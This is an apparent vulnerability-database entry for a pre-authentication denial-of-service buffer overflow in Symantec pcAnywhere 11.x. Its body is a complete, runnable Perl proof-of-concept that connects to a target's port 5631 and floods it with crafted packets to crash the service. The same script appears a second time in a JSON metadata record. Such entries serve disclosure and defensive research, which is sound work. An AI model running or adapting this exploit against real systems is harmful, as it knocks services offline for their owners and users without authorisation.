pcAnywhere 8.0/9.0/11.x Authentication Denial of Service Vulnerability
2014-07-01T00:00:00
ID SSV:80293 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/15646/info
Symantec pcAnywhere is vulnerable to a buffer overflow vulnerability. Because the flaw can be triggered prior to authentication, the vulnerability is exploitable by remote attackers without valid credentials. It is confirmed that the vulnerability can be exploited to cause a denial of service. Supported versions 11.0.1 and 11.5.1 are confirmed affected. Previous versions are vulnerable and users are advised to upgrade to the latest supported version.
Patches are available.
#!/usr/bin/perl -w
# Version 2.0
#
# PoC for
# pcAnywhere Authentication Denial of Service Vulnerability
# Bugtraq ID: 15646
#
# Tested on pcanywhere v11.0 and v11.0.1
#
# Author: David Maciejak
# Date: 20060117
#
##############################
use IO::Socket;
if (@ARGV<1)
{
die "usage: $0 pcanywhere_ip [port]";
}
$host=$ARGV[0];
$port=$ARGV[1] || 5631;
$|=1;
$cl1="\x00\x00\x00\x00";
$cl2="\x6F\x06\xff";
$cl3="\x6f\x61\x00\x09\x00\xfe\x00\x00\xff\xff\x00\x00\x00\x00";
$cl4="\x6f\x62\x01\x02\x00\x00\x00";
$sock = IO::Socket::INET->new( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp'
);
die "Could not create socket: $! \n" unless $sock;
$sock->send($cl1);
$sock->recv($buff,32768);
$sock->send($cl2 x 50);
$sock->recv($buff,32768);
$sock->send($cl3 x 50);
$sock->recv($buff,32768);
$sock->send($cl4);
$sock->recv($buff,32768);
$str='\x06'.'\x04'.'\0xffffffc0'x300;
$sock->send($str x 50);
close $sock;
{"lastseen": "2017-11-19T16:03:06", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T16:03:06", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:03:06", "rev": 2}, "vulnersScore": 0.2}, "href": "https://www.seebug.org/vuldb/ssvid-80293", "references": [], "enchantments_done": [], "id": "SSV:80293", "title": "pcAnywhere 8.0/9.0/11.x Authentication Denial of Service Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 4, "sourceData": "\n source: http://www.securityfocus.com/bid/15646/info\r\n\r\nSymantec pcAnywhere is vulnerable to a buffer overflow vulnerability. Because the flaw can be triggered prior to authentication, the vulnerability is exploitable by remote attackers without valid credentials. It is confirmed that the vulnerability can be exploited to cause a denial of service. Supported versions 11.0.1 and 11.5.1 are confirmed affected. Previous versions are vulnerable and users are advised to upgrade to the latest supported version.\r\n\r\nPatches are available. \r\n\r\n#!/usr/bin/perl -w\r\n# Version 2.0\r\n#\r\n# PoC for\r\n# pcAnywhere Authentication Denial of Service Vulnerability\r\n# Bugtraq ID: \t15646\r\n#\r\n# Tested on pcanywhere v11.0 and v11.0.1\r\n#\r\n# Author: David Maciejak\r\n# Date: 20060117\r\n#\r\n##############################\r\n\r\nuse IO::Socket;\r\n\r\nif (@ARGV<1)\r\n{\r\n\tdie "usage: $0 pcanywhere_ip [port]";\r\n}\r\n\r\n$host=$ARGV[0];\r\n$port=$ARGV[1] || 5631;\r\n\r\n$|=1;\r\n\r\n$cl1="\\x00\\x00\\x00\\x00";\r\n$cl2="\\x6F\\x06\\xff"; \r\n$cl3="\\x6f\\x61\\x00\\x09\\x00\\xfe\\x00\\x00\\xff\\xff\\x00\\x00\\x00\\x00";\r\n$cl4="\\x6f\\x62\\x01\\x02\\x00\\x00\\x00";\r\n\r\n$sock = IO::Socket::INET->new( PeerAddr => $host,\r\n\t\t \t PeerPort => $port,\r\n\t\t\t Proto => 'tcp'\r\n\t\t\t);\r\n\t\t\r\ndie "Could not create socket: $! \\n" unless $sock;\r\n\r\n$sock->send($cl1);\r\n$sock->recv($buff,32768);\r\n$sock->send($cl2 x 50);\r\n$sock->recv($buff,32768);\r\n$sock->send($cl3 x 50);\r\n$sock->recv($buff,32768);\r\n$sock->send($cl4);\r\n$sock->recv($buff,32768);\r\n\r\n$str='\\x06'.'\\x04'.'\\0xffffffc0'x300;\r\n$sock->send($str x 50);\r\nclose $sock;\r\n\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-80293", "type": "seebug"}